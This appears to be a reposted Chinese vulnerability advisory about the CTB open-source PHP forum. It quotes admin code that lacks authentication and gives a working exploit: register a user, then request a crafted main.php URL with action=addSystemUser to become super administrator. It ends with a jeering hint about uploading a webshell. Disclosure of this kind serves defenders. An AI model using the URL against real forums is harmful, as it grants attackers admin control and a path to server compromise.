当前位置: 首页 > 图文教程 > 网络编程 > PHP > 漂亮但不安全的CTB

PHP
PHP memcache扩展的三种安装方法
PHP 判断常量,变量和函数是否存在
PHP session有效期问题
PHP 读取文件的正确方法
apache2.2.4+mysql5.0.77+php5.2.8安装精简
PHP 字符串编码截取函数(兼容utf-8和gb2312)
PHP 错误之引号中使用变量
php 购物车的例子
PHP 身份证号验证函数
php结合飞信 免费天气预报短信
PHP SQLite类
PHP 在线翻译函数代码
PHPMyAdmin 快速配置方法
PHP 编写的 25个游戏脚本
php 购物车实例(申精)
PHP获取当前文件所在目录 getcwd()函数
DISCUZ 论坛管理员密码忘记的解决方法
PHP 采集心得技巧
抓取YAHOO股票报价的类
PHP 模拟登陆MSN并获得用户信息

PHP 中的 漂亮但不安全的CTB


出处:互联网   整理: 软晨网(RuanChen.com)   发布: 2009-09-13   浏览: 250 ::
收藏到网摘: n/a


>>>Dedicated This Scrap To CaoJing<<<
涉及版本:
^^^^^^^
目前所有版本(现在1.3Alpha为最高版本)
描述:
^^^^^^
CTB是一款由实易数码<11cn.org>;开发和维护的源代码开放的PHP论坛。由于其后台管理文件验证存在缺陷,可能导致非法用户直接添加论坛超级管理员,进而威胁论坛或服务器安全。
具体:
^^^^
CTB书写非常规范,代码井然有序,赏心悦目,的确是优美的程序;特别是其功能模块,着实让小弟学习了一把。但安全方面却令人堪忧:
试看如下代码:
/admin/main.php
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
//获取get变量
if( is_array($_GET) ) {
foreach($_GET as $k=>$v) {
if( is_array( $_GET[$k]) ) {
foreach($_GET[$k] as $k2=>$v2) {
$return[$k][$k2] = $v2;
}
} else {
$return[$k] = $v;
}
}
}
...
$mod = isset($_GET['mod']) ? $_GET['mod'] : $_POST['mod'];
if (!file_exists($mod.".php" {
$mod = "mainright";
}
require_once ($mod.".php";
//-----------------------------------------------------------------------------
//初始化类变量
$ctb = new Module;
$ctb->set = $set;
$ctb->tplPath = "./templates";
$ctb->input = $return;
$ctb->sess = isset($_COOKIE["sess_adminname"]) ? $_COOKIE : $_SESSION;
$ctb->execute();
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
这里没有任何验证,我们看看添加管理员的文件:
/admin/systemuser.php
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
class Module extends CommonClass
//系统管理模块子类
{
function execute() {
switch($this->input['action']) {
...
case 'addSystemUser':
$this->addSystemUser();
break;
...
}
}
function addSystemUser()
{
//输入数据简单格式化
$this->inputCheck("main.php?mod=systemuser&action=showSystemUser";
//执行添加操作
$this->file = "../".$this->set[dataPath]."/users/list.php";
$systemLine = $this->select(4, $this->input['systemUserName']);
....
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
依然没有验证,一路顺利啊!
利用方法:
^^^^^^^
先注册一个用户:
登陆ID: cat
用户名 : dog
密码: ilikecat
重复密码: ilikecat
信箱: [email protected]
接着提交如下URL:
http://www.target.com/ctb/admin/main.php?mod=systemuser&systemUserName=dog&systemUserMode=1&action=addSystemUser
哈哈,你现在已经是超级管理员了,不相信?提交如下URL后台登陆:
http://www.psych.com/ctb/admin/main.php?mod=login
管理名称: cat
管理密码: ilikecat
咦...还真成功了!
你现在是不是想更改后台上传文件类型,然后upload webshell?哼,被我猜到了吧...
后记:另外发现CTB代码注释有些扎眼的错别字,大煞风景,希望可以一起修正。